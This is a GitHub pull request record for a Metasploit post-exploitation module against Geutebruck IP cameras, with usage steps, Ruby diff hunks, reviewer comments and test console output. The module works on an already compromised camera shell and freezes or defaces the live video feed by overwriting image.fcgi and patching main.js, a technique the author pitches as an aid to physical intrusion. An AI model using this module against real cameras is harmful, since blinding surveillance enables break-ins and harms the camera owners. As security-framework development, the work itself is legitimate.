### PR TITLE
Add Geutebruck Post Exploitation Module

### PR DESCRIPTION
**Pull request by D14bloo**
This module will be applied on a session connected to a Geutebruck Camera shell. It will freeze the camera display/deface
the display of the camera on the web panel with an image as it can be very useful during a red team engagement and would help for an initial physical intrusion..

Users can find additional details of the related vulnerabilities on the blogpost page at https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/.

## Vulnerable Application

The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.27, firmware version 1.12.13.2 or firmware version 1.12.14.5:
* Encoder and E2 Series Camera models:
  * G-Code:
    * EEC-2xxx
  * G-Cam:
    * EBC-21xx
    * EFD-22xx
    * ETHC-22xx
    * EWPC-22xx

Many brands use the same firmware:
  * UDP Technology (which is also the supplier of the firmware for the other vendors)
  * Ganz
  * Visualint
  * Cap
  * THRIVE Intelligence
  * Sophus
  * VCA
  * TripCorps
  * Sprinx Technologies
  * Smartec
  * Riva

This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running the latest firmware version 1.12.0.27.
### Freezing image
  1. Launch msfconsole
  2. Get a shell using one of the published Getebruck exploits
  3. Do: `use post/linux/manage/geutebruck_post_exp`
  4. Do: `set SESSION <session number of the Geutebruck shell>`
  5. Do: `set action FREEZE_CAMERA`
  6. Do: `run` 
  7. The image should be frozen

### Replacing by a custom image
  1. Launch msfconsole
  2. Get a shell using one of the published Getebruck exploits
  3. Do: `use post/linux/manage/geutebruck_post_exp`
  4. Do: `set SESSION <session number of the Geutebruck shell>`
  5. Do: `set action REPLACE_IMAGE`
  6. Do: `set IMAGE /local/image/path/to/upload`
  7. Do: `run` 
  8. The image should be replaced by the custom one

### Restore original state
  1. Launch msfconsole
  2. Get a shell using one of the published Getebruck exploits
  3. Do: `use post/linux/manage/geutebruck_post_exp`
  4. Do: `set SESSION <session number of the Geutebruck shell>`
  5. Do: `set action RESUME_STREAM`
  6. Do: `run` 
  7. The stream should be resumed

### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.0.27.
```
@use post/linux/manage/geutebruck_post_exp
msf6 post(linux/manage/geutebruck_post_exp) > show actions

Post actions:

   Name           Description
   ----           -----------
   CHANGE_IMAGE   It replaces the video stream by an arbitrary image
   FREEZE_CAMERA  It freezes the last image from the video stream
   RESUME_STREAM  It resumes the video stream back to a normal state


msf6 post(linux/manage/geutebruck_post_exp) > show options

Module options (post/linux/manage/geutebruck_post_exp):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   IMAGE                     no        Local image path to upload
   SESSION                   yes       The session to run this module on.


Post action:

   Name           Description
   ----           -----------
   FREEZE_CAMERA  It freezes the last image from the video stream


msf6 post(linux/manage/geutebruck_post_exp) > set IMAGE /var/randori.jpg
IMAGE => /var/randori.jpg
msf6 post(linux/manage/geutebruck_post_exp) > set action CHANGE_IMAGE
action => CHANGE_IMAGE
msf6 post(linux/manage/geutebruck_post_exp) > set session 1
session => 1
msf6 post(linux/manage/geutebruck_post_exp) > run

[!] SESSION may not be compatible with this module.
[*] -- Starting action --
[*] Uploading a custom image...
[*] Backing up the original main.js...
[*] Using the new main.js...
[*] Done! The stream should be replaced by your image!
[*] Post module execution completed
msf6 post(linux/manage/geutebruck_post_exp) > set action FREEZE_CAMERA
action => FREEZE_CAMERA
msf6 post(linux/manage/geutebruck_post_exp) > run

[!] SESSION may not be compatible with this module.
[*] -- Starting action --
[*] Taking a snapshot...
[*] Freezing the stream...
[*] Backing up the original main.js...
[*] Using the new main.js...
[*] Stream frozen!
[*] Post module execution completed
msf6 post(linux/manage/geutebruck_post_exp) > set action RESUME_STREAM
action => RESUME_STREAM
msf6 post(linux/manage/geutebruck_post_exp) > run

[!] SESSION may not be compatible with this module.
[*] -- Starting action --
[*] Restoring main.js backup...
[*] Restored! Stream back to a normal state.
[*] Post module execution completed
```

Screenshot 2021-07-30 at 18 08 23
##  Results 
Camera display defaced with a provided image :

Screenshot 2021-07-30 at 17 56 25

PCAP was sent by mail.

### CODE REVIEW

**Comment by TrGFxX** [comment]
Hello @gwillcox-r7, any updates for this module?

**Comment by gwillcox-r7** [comment]
> Hello @gwillcox-r7, any updates for this module?

Haven't yet taken a look at this as I was focused on trying to get https://github.com/rapid7/metasploit-framework/pull/15603 landed. Now that it is landed I should be able to look into getting this into the framework after I land one other PR 👍

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 1]
```diff
@@ -0,0 +1,79 @@
...
+  end
+
+  def run
+    print_status('-- Starting action --')
+    send("action_#{action.name.downcase}")
+  end
+
+  def action_freeze_camera
+    backup_image_fcgi
+    print_status('Taking a snapshot...')
```
Comment (gwillcox-r7) [inline modules/post/linux/manage/geutebruck_post_exp.rb:42]:
```suggestion
    print_status('Taking a snapshot of the current stream to use as the static image to freeze the stream on...')
```

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 2]
```diff
@@ -0,0 +1,79 @@
...
+    cmd_exec('curl http://localhost/test/../uapi-cgi/snapshot.fcgi -o /usr/www/uapi-cgi/viewer/image.fcgi')
+    print_status('Freezing the stream...')
```
Comment (gwillcox-r7) [inline modules/post/linux/manage/geutebruck_post_exp.rb:44]:
```suggestion
    print_status('Freezing the stream on the captured image...')
```

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 3]
```diff
@@ -0,0 +1,79 @@
...
+        ['FREEZE_CAMERA', { 'Description' => 'It freezes the last image from the video stream' }],
+        ['CHANGE_IMAGE', { 'Description' => 'It replaces the video stream by an arbitrary image' }],
+        ['RESUME_STREAM', { 'Description' => 'It resumes the video stream back to a normal state' }]
+      ],
+      'DefaultAction' => 'FREEZE_CAMERA'
+    )
+
+    register_options(
+      [
+        OptString.new('IMAGE', [false, 'Local image path to upload']),
```
Comment (gwillcox-r7) [inline modules/post/linux/manage/geutebruck_post_exp.rb:30]:
```suggestion
        OptString.new('IMAGE', [false, 'Full path to the local copy of the image to upload']),
```

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 4]
```diff
@@ -0,0 +1,79 @@
...
+    backup_image_fcgi
+    print_status('Uploading a custom image...')
+    upload_file('/usr/www/uapi-cgi/viewer/image.fcgi', datastore['image'])
+    pwn_main_js
+    print_status('Done! The stream should be replaced by your image!')
+  end
+
+  def action_resume_stream
+    print_status('Restoring image.fcgi...')
+    cmd_exec('mv /usr/www/uapi-cgi/viewer/image.fcgi.bak /usr/www/uapi-cgi/viewer/image.fcgi')
```
Comment (gwillcox-r7) [inline modules/post/linux/manage/geutebruck_post_exp.rb:60]: Many of your commands assume a previous command has been executed and do not operate independently of one another. You should address this.

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 5]
```diff
@@ -0,0 +1,79 @@
...
+    print_status('Freezing the stream...')
+    pwn_main_js
+    print_status('Stream frozen!')
+  end
+
+  def action_change_image
+    fail_with(Failure::BadConfig, 'The IMAGE option is required by the CHANGE_IMAGE action.') if datastore['IMAGE'].blank?
+    backup_image_fcgi
+    print_status('Uploading a custom image...')
+    upload_file('/usr/www/uapi-cgi/viewer/image.fcgi', datastore['image'])
```
Comment (gwillcox-r7) [inline modules/post/linux/manage/geutebruck_post_exp.rb:53]: You should probably check and make sure this file exists and is actually a supported type prior to trying to upload it.

**Review by gwillcox-r7 — CHANGES_REQUESTED** [review]

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 6]
```diff
@@ -0,0 +1,79 @@
...
+    cmd_exec('cp /usr/www/viewer/js/main.js /usr/www/viewer/js/main2.js')
+    cmd_exec('mv /usr/www/viewer/js/main.js /usr/www/viewer/js/main.js.bak')
+    print_status('Using the new main.js...')
+    cmd_exec("sed '/ImageBuf.src = snapshot_url;/ i snapshot_url=\"/uapi-cgi/viewer/image.fcgi\"' -i /usr/www/viewer/js/main2.js")
+    cmd_exec('mv /usr/www/viewer/js/main2.js /usr/www/viewer/js/main.js')
+  end
+
+  def backup_image_fcgi
+    print_status('Backing up image.fcgi...')
+    cmd_exec('cp /usr/www/uapi-cgi/viewer/image.fcgi /usr/www/uapi-cgi/viewer/image.fcgi.bak')
```
Comment (smcintyre-r7) [inline modules/post/linux/manage/geutebruck_post_exp.rb:77]: There's actually `copy_file` and `move_file` (it's an alias of `rename_file`) methods in the file mixin that you're already including. Using those would be preferable vs executing commands to handle each.

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 7]
```diff
@@ -0,0 +1,79 @@
...
+    register_options(
+      [
+        OptString.new('IMAGE', [false, 'Local image path to upload']),
+      ]
+    )
+  end
+
+  def run
+    print_status('-- Starting action --')
+    send("action_#{action.name.downcase}")
```
[the remark this answers is not in the document]
Comment (smcintyre-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb:37]: This works just fine and there's precedence for using it that's been set elsewhere in the framework. See the `post/android/local/koffee` and `post/windows/manage/vss` modules.

File: modules/post/linux/manage/geutebruck_post_exp.rb (hunk 6 above)
Comment (gwillcox-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb]: Fixed with https://github.com/rapid7/metasploit-framework/pull/15601/commits/ba5cd6991732425046454306b997fbb5453483f1

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 8]
```diff
@@ -0,0 +1,79 @@
...
+    backup_image_fcgi
+    print_status('Taking a snapshot...')
+    cmd_exec('curl http://localhost/test/../uapi-cgi/snapshot.fcgi -o /usr/www/uapi-cgi/viewer/image.fcgi')
+    print_status('Freezing the stream...')
+    pwn_main_js
+    print_status('Stream frozen!')
+  end
+
+  def action_change_image
+    fail_with(Failure::BadConfig, 'The IMAGE option is required by the CHANGE_IMAGE action.') if datastore['IMAGE'].blank?
```
[the remark this answers is not in the document]
Comment (gwillcox-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb]: Fixed with https://github.com/rapid7/metasploit-framework/pull/15601/commits/ba5cd6991732425046454306b997fbb5453483f1

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 9]
```diff
@@ -0,0 +1,79 @@
...
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+
+  def initialize
+    super(
+      'Name' => 'Geutebruck Camera Deface',
+      'Description' => %q{
+        This module will be applied on a session connected to a Geutebruck Camera shell. It will freeze the camera display/deface
+        the display of the camera on the web panel with an image.
```
[the remark this answers is not in the document]
Comment (gwillcox-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb]: Fixed with https://github.com/rapid7/metasploit-framework/pull/15601/commits/ba5cd6991732425046454306b997fbb5453483f1

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 10]
```diff
@@ -0,0 +1,79 @@
...
+      },
+      'Author' => 'Ibrahim Ayadhi, Sébastien Charbonnier - RandoriSec',
```
[the remark this answers is not in the document]
Comment (gwillcox-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb]: Fixed with https://github.com/rapid7/metasploit-framework/pull/15601/commits/ba5cd6991732425046454306b997fbb5453483f1, but let me know if this need further edits @TrGFxX

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 11]
```diff
@@ -0,0 +1,79 @@
...
+      'License' => MSF_LICENSE,
+      'Platform' => ['linux'],
+      'SessionTypes' => ['shell'],
+      'Actions' => [
+        ['FREEZE_CAMERA', { 'Description' => 'It freezes the last image from the video stream' }],
```
[the remark this answers is not in the document]
Comment (gwillcox-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb]: Fixed with https://github.com/rapid7/metasploit-framework/pull/15601/commits/ba5cd6991732425046454306b997fbb5453483f1

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 12]
```diff
@@ -0,0 +1,79 @@
...
+        ['CHANGE_IMAGE', { 'Description' => 'It replaces the video stream by an arbitrary image' }],
```
[the remark this answers is not in the document]
Comment (gwillcox-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb]: Fixed with https://github.com/rapid7/metasploit-framework/pull/15601/commits/ba5cd6991732425046454306b997fbb5453483f1

File: modules/post/linux/manage/geutebruck_post_exp.rb [hunk 13]
```diff
@@ -0,0 +1,79 @@
...
+        ['RESUME_STREAM', { 'Description' => 'It resumes the video stream back to a normal state' }]
```
[the remark this answers is not in the document]
Comment (gwillcox-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb]: Fixed with https://github.com/rapid7/metasploit-framework/pull/15601/commits/ba5cd6991732425046454306b997fbb5453483f1

File: modules/post/linux/manage/geutebruck_post_exp.rb (hunk 1 above)
Comment (gwillcox-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb]: Fixed with https://github.com/rapid7/metasploit-framework/pull/15601/commits/ba5cd6991732425046454306b997fbb5453483f1

File: modules/post/linux/manage/geutebruck_post_exp.rb (hunk 2 above)
Comment (gwillcox-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb]: Fixed with https://github.com/rapid7/metasploit-framework/pull/15601/commits/ba5cd6991732425046454306b997fbb5453483f1

File: modules/post/linux/manage/geutebruck_post_exp.rb (hunk 5 above)
Comment (gwillcox-r7) [reply modules/post/linux/manage/geutebruck_post_exp.rb:66]: Resolved with https://github.com/rapid7/metasploit-framework/pull/15601/commits/959d830238710c3b5aa7161fb4db01ad3f972a45

**Comment by gwillcox-r7** [comment]
Alright assuming all tests pass this should be ready to confirm once again @TrGFxX. If you can retest and send over a PCAP capture or video to the usual email then I should be able to land this 👍

**Comment by TrGFxX** [comment]
Hello @gwillcox-r7, i made some changes on the module but it seems that the methods copy_file and move_file are causing errors:
```
msf6 post(linux/manage/geutebruck_post_exp) > set ACTION FREEZE_CAMERA
ACTION => FREEZE_CAMERA
msf6 post(linux/manage/geutebruck_post_exp) > run

[!] SESSION may not be compatible with this module (incompatible session platform: unix)
[*] -- Starting action --
[*] Taking a snapshot of the current stream to use as the static image to freeze the stream on...
[*] Freezing the stream on the captured image...
[*] Backing up the original main.js...
[-] Post failed: ArgumentError wrong number of arguments (given 0, expected 1)
[-] Call stack:
[-]   /opt/metasploit-framework/embedded/framework/lib/msf/core/post/file.rb:143:in `directory?'
[-]   /opt/metasploit-framework/embedded/framework/lib/msf/core/post/file.rb:574:in `rename_file'
[-]   /opt/metasploit-framework/embedded/framework/modules/post/linux/manage/geutebruck_post_exp.rb:82:in `pwn_main_js'
[-]   /opt/metasploit-framework/embedded/framework/modules/post/linux/manage/geutebruck_post_exp.rb:56:in `action_freeze_camera'
[-]   /opt/metasploit-framework/embedded/framework/modules/post/linux/manage/geutebruck_post_exp.rb:44:in `run'
[*] Post module execution completed
msf6 post(linux/manage/geutebruck_post_exp) >
```
Any idea?

**Review by gwillcox-r7 — APPROVED** [review]

File: documentation/modules/post/linux/manage/geutebruck_post_exp.md [hunk 14]
```diff
@@ -0,0 +1,137 @@
...
+[*] Using the new main.js...
+[*] Stream frozen!
+[*] Post module execution completed
+msf6 post(linux/manage/geutebruck_post_exp) > set action RESUME_STREAM
+action => RESUME_STREAM
+msf6 post(linux/manage/geutebruck_post_exp) > run
+
+[!] SESSION may not be compatible with this module.
+[*] -- Starting action --
+[*] Restoring image.fcgi...
```
Comment (gwillcox-r7) [inline documentation/modules/post/linux/manage/geutebruck_post_exp.md:133]: This line is no longer going to be output, this document will need updating for the recent changes.

**Comment by gwillcox-r7** [comment]
> [-]   /opt/metasploit-framework/embedded/framework/lib/msf/core/post/file.rb:143:in `directory?'
> [-]   /opt/metasploit-framework/embedded/framework/lib/msf/core/post/file.rb:574:in `rename_file'
> [-]   /opt/metasploit-framework/embedded/framework/modules/post/linux/manage/geutebruck_post_exp.rb:82:in `pwn_main_js'
> [-]   /opt/metasploit-framework/embedded/framework/modules/post/linux/manage/geutebruck_post_exp.rb:56:in `action_freeze_camera'
> [-]   /opt/metasploit-framework/embedded/framework/modules/post/linux/manage/geutebruck_post_exp.rb:44:in `run'


Lets trace this error back. The last call is in line 82 of `/opt/metasploit-framework/embedded/framework/modules/post/linux/manage/geutebruck_post_exp.rb` which is within `pwn_main_js`. Well line 81 and 82 of `/opt/metasploit-framework/embedded/framework/modules/post/linux/manage/geutebruck_post_exp.rb` are:

```
    copy_file('/usr/www/viewer/js/main.js', '/usr/www/viewer/js/main2.js')
    move_file('/usr/www/viewer/js/main.js', '/usr/www/viewer/js/main.js.bak')
```

And given that `move_file` is an alias for `rename_file` and that we see a call to `rename_file` in the stack trace we can assume the `copy_file` call executed successfully. But what is line 574 of `/opt/metasploit-framework/embedded/framework/lib/msf/core/post/file.rb`?

https://github.com/rapid7/metasploit-framework/blob/d90c0293ec0c941afae4580fb88e4a600a79c3d7/lib/msf/core/post/file.rb#L574

Annnnnnd we have an issue here. Seems the core library is calling `directory?` with no arguments. Not sure why this is happening but this would explain why we have 0 arguments being passed in to the call when 1 is expected.

Looks like this is a bug in our core library code I'll need to update in another PR. Thanks for picking this up!

**Comment by gwillcox-r7** [comment]
Okay sorry about that @TrGFxX we fixed the issue that was preventing this from working in https://github.com/rapid7/metasploit-framework/pull/15639. Should be good to test now.

**Comment by TrGFxX** [comment]
> Okay sorry about that @TrGFxX we fixed the issue that was preventing this from working in #15639. Should be good to test now.

Hello @gwillcox-r7, works fine ! 
```
msf6 exploit(linux/http/geutebruck_instantrec_bof_last) > use post/linux/manage/geutebruck_post_exp
msf6 post(linux/manage/geutebruck_post_exp) > set IMAGE /var/randori.jpg
IMAGE => /var/randori.jpg
msf6 post(linux/manage/geutebruck_post_exp) > set action CHANGE_IMAGE
action => CHANGE_IMAGE
msf6 post(linux/manage/geutebruck_post_exp) > set session 1
session => 1
msf6 post(linux/manage/geutebruck_post_exp) > run

[!] SESSION may not be compatible with this module (incompatible session platform: unix)
[*] -- Starting action --
[*] Uploading a custom image...
[*] Max line length is 65537
[*] /usr/bin/printf '\0\377\376\111\115\112\131\177\45\45\15\12' Failed: "/bin/sh: line 12: /usr/bin/printf: No such file or directory\n" != "\x00\xFF\xFEIMJY\x7F%%\r\n"
[*] Writing 39408 bytes in 3 chunks of 60327 bytes (octal-encoded), using printf
[*] Next chunk is 61054 bytes
[*] Next chunk is 24936 bytes
[*] Backing up the original main.js...
[*] Using the new main.js...
[*] Done! The stream should be replaced by your image!
[*] Post module execution completed
msf6 post(linux/manage/geutebruck_post_exp) > show options

Module options (post/linux/manage/geutebruck_post_exp):

   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   IMAGE    /var/randori.jpg  no        Full path to the local copy of the image to upload
   SESSION  1                 yes       The session to run this module on.


Post action:

   Name          Description
   ----          -----------
   CHANGE_IMAGE  Display an arbitrary image instead of the video stream


msf6 post(linux/manage/geutebruck_post_exp) > show actions

Post actions:

   Name           Description
   ----           -----------
   CHANGE_IMAGE   Display an arbitrary image instead of the video stream
   FREEZE_CAMERA  Freeze the camera and display the last image taken from the video stream
   RESUME_STREAM  Resume the camera's video stream and display the current live feed


msf6 post(linux/manage/geutebruck_post_exp) > set action FREEZE_CAMERA
action => FREEZE_CAMERA
msf6 post(linux/manage/geutebruck_post_exp) > run

[!] SESSION may not be compatible with this module (incompatible session platform: unix)
[*] -- Starting action --
[*] Taking a snapshot of the current stream to use as the static image to freeze the stream on...
[*] Freezing the stream on the captured image...
[*] Backing up the original main.js...
[*] Using the new main.js...
[*] Stream frozen!
[*] Post module execution completed
msf6 post(linux/manage/geutebruck_post_exp) > set action RESUME_STREAM
action => RESUME_STREAM
msf6 post(linux/manage/geutebruck_post_exp) > run

[!] SESSION may not be compatible with this module (incompatible session platform: unix)
[*] -- Starting action --
[*] Resuming stream...
[*] Restoring main.js backup...
[*] Restored! Stream back to a normal state.
[*] Post module execution completed
msf6 post(linux/manage/geutebruck_post_exp) >
```

**Comment by gwillcox-r7** [comment]
Thanks for testing @TrGFxX will get this landed now 👍

**Comment by gwillcox-r7** [comment]
> > Okay sorry about that @TrGFxX we fixed the issue that was preventing this from working in #15639. Should be good to test now.
> 
> Hello @gwillcox-r7, works fine !
> 
> ```
> msf6 exploit(linux/http/geutebruck_instantrec_bof_last) > use post/linux/manage/geutebruck_post_exp
> msf6 post(linux/manage/geutebruck_post_exp) > set IMAGE /var/randori.jpg
> IMAGE => /var/randori.jpg
> msf6 post(linux/manage/geutebruck_post_exp) > set action CHANGE_IMAGE
> action => CHANGE_IMAGE
> msf6 post(linux/manage/geutebruck_post_exp) > set session 1
> session => 1
> msf6 post(linux/manage/geutebruck_post_exp) > run
> 
> [!] SESSION may not be compatible with this module (incompatible session platform: unix)
> [*] -- Starting action --
> [*] Uploading a custom image...
> [*] Max line length is 65537
> [*] /usr/bin/printf '\0\377\376\111\115\112\131\177\45\45\15\12' Failed: "/bin/sh: line 12: /usr/bin/printf: No such file or directory\n" != "\x00\xFF\xFEIMJY\x7F%%\r\n"
> [*] Writing 39408 bytes in 3 chunks of 60327 bytes (octal-encoded), using printf
> [*] Next chunk is 61054 bytes
> [*] Next chunk is 24936 bytes
> [*] Backing up the original main.js...
> [*] Using the new main.js...
> [*] Done! The stream should be replaced by your image!
> [*] Post module execution completed
> msf6 post(linux/manage/geutebruck_post_exp) > show options
> 
> Module options (post/linux/manage/geutebruck_post_exp):
> 
>    Name     Current Setting   Required  Description
>    ----     ---------------   --------  -----------
>    IMAGE    /var/randori.jpg  no        Full path to the local copy of the image to upload
>    SESSION  1                 yes       The session to run this module on.
> 
> 
> Post action:
> 
>    Name          Description
>    ----          -----------
>    CHANGE_IMAGE  Display an arbitrary image instead of the video stream
> 
> 
> msf6 post(linux/manage/geutebruck_post_exp) > show actions
> 
> Post actions:
> 
>    Name           Description
>    ----           -----------
>    CHANGE_IMAGE   Display an arbitrary image instead of the video stream
>    FREEZE_CAMERA  Freeze the camera and display the last image taken from the video stream
>    RESUME_STREAM  Resume the camera's video stream and display the current live feed
> 
> 
> msf6 post(linux/manage/geutebruck_post_exp) > set action FREEZE_CAMERA
> action => FREEZE_CAMERA
> msf6 post(linux/manage/geutebruck_post_exp) > run
> 
> [!] SESSION may not be compatible with this module (incompatible session platform: unix)
> [*] -- Starting action --
> [*] Taking a snapshot of the current stream to use as the static image to freeze the stream on...
> [*] Freezing the stream on the captured image...
> [*] Backing up the original main.js...
> [*] Using the new main.js...
> [*] Stream frozen!
> [*] Post module execution completed
> msf6 post(linux/manage/geutebruck_post_exp) > set action RESUME_STREAM
> action => RESUME_STREAM
> msf6 post(linux/manage/geutebruck_post_exp) > run
> 
> [!] SESSION may not be compatible with this module (incompatible session platform: unix)
> [*] -- Starting action --
> [*] Resuming stream...
> [*] Restoring main.js backup...
> [*] Restored! Stream back to a normal state.
> [*] Post module execution completed
> msf6 post(linux/manage/geutebruck_post_exp) >
> ```

Just to confirm did the `[*] /usr/bin/printf '\0\377\376\111\115\112\131\177\45\45\15\12' Failed: "/bin/sh: line 12: /usr/bin/printf: No such file or directory\n" != "\x00\xFF\xFEIMJY\x7F%%\r\n"` line affect anything? Seems like that may have been a failure somewhere?

**Comment by TrGFxX** [comment]
> > > Okay sorry about that @TrGFxX we fixed the issue that was preventing this from working in #15639. Should be good to test now.
> > 
> > 
> > Hello @gwillcox-r7, works fine !
> > ```
> > msf6 exploit(linux/http/geutebruck_instantrec_bof_last) > use post/linux/manage/geutebruck_post_exp
> > msf6 post(linux/manage/geutebruck_post_exp) > set IMAGE /var/randori.jpg
> > IMAGE => /var/randori.jpg
> > msf6 post(linux/manage/geutebruck_post_exp) > set action CHANGE_IMAGE
> > action => CHANGE_IMAGE
> > msf6 post(linux/manage/geutebruck_post_exp) > set session 1
> > session => 1
> > msf6 post(linux/manage/geutebruck_post_exp) > run
> > 
> > [!] SESSION may not be compatible with this module (incompatible session platform: unix)
> > [*] -- Starting action --
> > [*] Uploading a custom image...
> > [*] Max line length is 65537
> > [*] /usr/bin/printf '\0\377\376\111\115\112\131\177\45\45\15\12' Failed: "/bin/sh: line 12: /usr/bin/printf: No such file or directory\n" != "\x00\xFF\xFEIMJY\x7F%%\r\n"
> > [*] Writing 39408 bytes in 3 chunks of 60327 bytes (octal-encoded), using printf
> > [*] Next chunk is 61054 bytes
> > [*] Next chunk is 24936 bytes
> > [*] Backing up the original main.js...
> > [*] Using the new main.js...
> > [*] Done! The stream should be replaced by your image!
> > [*] Post module execution completed
> > msf6 post(linux/manage/geutebruck_post_exp) > show options
> > 
> > Module options (post/linux/manage/geutebruck_post_exp):
> > 
> >    Name     Current Setting   Required  Description
> >    ----     ---------------   --------  -----------
> >    IMAGE    /var/randori.jpg  no        Full path to the local copy of the image to upload
> >    SESSION  1                 yes       The session to run this module on.
> > 
> > 
> > Post action:
> > 
> >    Name          Description
> >    ----          -----------
> >    CHANGE_IMAGE  Display an arbitrary image instead of the video stream
> > 
> > 
> > msf6 post(linux/manage/geutebruck_post_exp) > show actions
> > 
> > Post actions:
> > 
> >    Name           Description
> >    ----           -----------
> >    CHANGE_IMAGE   Display an arbitrary image instead of the video stream
> >    FREEZE_CAMERA  Freeze the camera and display the last image taken from the video stream
> >    RESUME_STREAM  Resume the camera's video stream and display the current live feed
> > 
> > 
> > msf6 post(linux/manage/geutebruck_post_exp) > set action FREEZE_CAMERA
> > action => FREEZE_CAMERA
> > msf6 post(linux/manage/geutebruck_post_exp) > run
> > 
> > [!] SESSION may not be compatible with this module (incompatible session platform: unix)
> > [*] -- Starting action --
> > [*] Taking a snapshot of the current stream to use as the static image to freeze the stream on...
> > [*] Freezing the stream on the captured image...
> > [*] Backing up the original main.js...
> > [*] Using the new main.js...
> > [*] Stream frozen!
> > [*] Post module execution completed
> > msf6 post(linux/manage/geutebruck_post_exp) > set action RESUME_STREAM
> > action => RESUME_STREAM
> > msf6 post(linux/manage/geutebruck_post_exp) > run
> > 
> > [!] SESSION may not be compatible with this module (incompatible session platform: unix)
> > [*] -- Starting action --
> > [*] Resuming stream...
> > [*] Restoring main.js backup...
> > [*] Restored! Stream back to a normal state.
> > [*] Post module execution completed
> > msf6 post(linux/manage/geutebruck_post_exp) >
> > ```
> 
> Just to confirm @TrGFxX did the `[*] /usr/bin/printf '\0\377\376\111\115\112\131\177\45\45\15\12' Failed: "/bin/sh: line 12: /usr/bin/printf: No such file or directory\n" != "\x00\xFF\xFEIMJY\x7F%%\r\n"` line affect anything? Seems like that may have been a failure somewhere?

@gwillcox-r7 All good ! It doesn't affect anything

**Comment by gwillcox-r7** [comment]
# Release Note
A new module has been added which allows one to take a session on a Geutebruck Camera shell and either freeze the current display stream, replace the current display stream with a static image, or restore the display stream such that it will display the current live feed from the camera.

**Pull request merged**